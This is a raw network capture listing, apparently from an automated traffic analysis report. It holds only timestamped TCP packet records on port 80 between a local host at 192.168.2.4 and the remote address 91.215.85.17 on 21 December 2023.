                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.020937920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.020982027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021025896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021125078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021173000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021215916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021296024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021337986 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021383047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021450996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021492958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021665096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021724939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021780968 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021833897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021917105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021959066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.021989107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022048950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022092104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022120953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022181034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022223949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022284985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022327900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022402048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022413015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022517920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022561073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022603989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022661924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022706032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022736073 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022810936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022860050 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022923946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.022988081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023041010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023053885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023108959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023152113 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023173094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023257017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023303032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023725033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023802042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023844004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023894072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.023988962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024034977 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024077892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024156094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024198055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024287939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024360895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024399996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024447918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024543047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024585009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024633884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024717093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024764061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024796963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024898052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024941921 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.024988890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025069952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025111914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025141954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025244951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025288105 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025317907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025415897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025456905 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025500059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025561094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025603056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025650978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025742054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025794029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025876045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025954962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.025998116 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026046991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026109934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026164055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026195049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026274920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026331902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026360989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026458979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026506901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026531935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026685953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026732922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026751041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026851892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026890993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.026942015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027020931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027076960 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027116060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027213097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027260065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027307987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027375937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027426004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027470112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027559042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027633905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027673006 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027703047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027740955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027770042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027849913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027898073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.027925968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028019905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028076887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028134108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028228998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028301954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028309107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028449059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028492928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028542995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028610945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028650999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028696060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028773069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028815985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.028867960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029005051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029050112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029099941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029177904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029217958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029263973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029350996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029500961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029532909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029577017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029623985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029654026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029747963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029792070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029819012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029912949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.029958963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030006886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030086994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030132055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030175924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030235052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030275106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030349970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030441046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030482054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030528069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030622959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030664921 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030680895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030777931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030817032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030864954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.030961037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031004906 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031053066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031148911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031193018 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031214952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031306982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031351089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031400919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031498909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031539917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031586885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031688929 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031732082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031781912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031846046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031898022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031938076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.031996965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032040119 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032105923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032186031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032227993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032272100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032351971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032397032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032433987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032532930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032577038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032607079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032695055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032735109 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032783985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032870054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032912970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.032957077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033034086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033077955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033127069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033215046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033258915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033314943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033379078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033418894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033463955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033503056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033549070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033593893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033675909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033716917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033718109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033776045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033826113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033834934 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033879042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033912897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033927917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.033976078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034003973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034018993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034070969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034115076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034138918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034198999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034248114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034265995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034360886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034403086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034405947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034466028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034498930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034507990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034643888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034687042 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034714937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034729004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034760952 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.034818888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.076422930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.076491117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.287873030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288001060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288083076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288209915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288223982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288333893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288362026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288374901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.288422108 CET4973880192.168.2.491.215.85.17
